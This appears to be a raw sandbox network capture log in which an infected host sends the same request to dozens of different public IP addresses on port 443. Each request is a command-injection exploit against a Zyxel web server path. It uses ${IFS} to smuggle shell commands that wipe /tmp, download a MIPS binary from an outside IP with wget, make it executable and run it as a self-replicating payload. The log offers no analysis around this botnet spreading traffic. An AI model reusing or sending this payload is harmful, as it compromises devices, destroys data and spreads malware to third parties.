                                        Mar 31, 2024 09:21:54.293736935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6141192.168.2.2349640163.184.24.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293766022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6142192.168.2.2355624121.69.249.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293807983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6143192.168.2.2350574106.234.180.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293838024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6144192.168.2.234505862.81.86.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293880939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6145192.168.2.235708271.66.73.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293919086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6146192.168.2.234323660.62.31.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293965101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6147192.168.2.23547248.182.135.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294014931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6148192.168.2.2338144186.161.217.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294056892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6149192.168.2.2358080105.72.178.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294089079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6150192.168.2.236022232.194.129.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294146061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6151192.168.2.2349238136.146.186.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294183016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6152192.168.2.2351592173.110.180.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294222116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6153192.168.2.234397694.205.226.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294266939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6154192.168.2.2340278186.116.20.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294297934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6155192.168.2.2347100150.213.224.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294342041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6156192.168.2.236090860.16.173.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294380903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6157192.168.2.23380169.149.213.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294413090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6158192.168.2.235255063.39.27.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294441938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6159192.168.2.2333686212.74.38.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294498920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6160192.168.2.235528060.234.27.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294531107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6161192.168.2.233785842.251.72.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294567108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6162192.168.2.2339592131.194.75.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294593096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6163192.168.2.235575693.171.33.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294637918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6164192.168.2.2338004198.152.133.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294673920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6165192.168.2.2353644131.179.196.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294717073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6166192.168.2.2357184166.201.221.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294771910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6167192.168.2.2339836208.156.63.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294800997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6168192.168.2.236004418.28.251.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294830084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6169192.168.2.2337880140.79.33.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294868946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6170192.168.2.2360470209.130.0.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294915915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6171192.168.2.2350016132.35.219.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294945002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6172192.168.2.2355458137.138.169.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.294991970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6173192.168.2.2337132172.248.238.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295047045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6174192.168.2.235468613.252.129.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295073032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6175192.168.2.2339940159.236.142.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295111895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6176192.168.2.234646659.210.207.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295146942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6177192.168.2.2343012143.245.168.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295182943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6178192.168.2.234743850.178.75.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295231104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6179192.168.2.2340060198.141.93.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295264006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6180192.168.2.235529069.238.186.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295285940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6181192.168.2.235884427.159.228.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295336962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6182192.168.2.2347594188.195.153.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295382023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6183192.168.2.2341644164.222.196.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295413017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6184192.168.2.2333374107.79.212.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295460939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6185192.168.2.2334016206.77.213.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295494080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6186192.168.2.2348562167.120.38.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295542955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6187192.168.2.2339722204.25.163.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295574903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6188192.168.2.235462293.164.49.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295619011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6189192.168.2.235013296.160.63.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295650959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6190192.168.2.235688089.94.229.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295696020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6191192.168.2.2350030160.232.87.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295757055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6192192.168.2.233973680.77.149.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295784950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6193192.168.2.23583022.252.124.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295829058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6194192.168.2.2348280196.216.188.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295860052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6195192.168.2.235752459.98.57.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295900106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6196192.168.2.234206894.92.31.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295943975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6197192.168.2.2335416219.165.235.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.295980930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6198192.168.2.2356012205.229.57.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296022892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6199192.168.2.2359614203.238.36.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296060085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6200192.168.2.234442423.79.249.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296093941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6201192.168.2.2341806221.32.141.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296133995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6202192.168.2.2345810166.234.243.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296171904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6203192.168.2.2340410165.195.15.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296226025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6204192.168.2.2360392170.207.112.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296245098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6205192.168.2.2349234184.205.18.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296297073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6206192.168.2.234044831.39.94.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296335936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6207192.168.2.2349222182.180.24.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296379089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6208192.168.2.2341200145.171.198.104443
                                        TimestampBytes transferredDirectionData
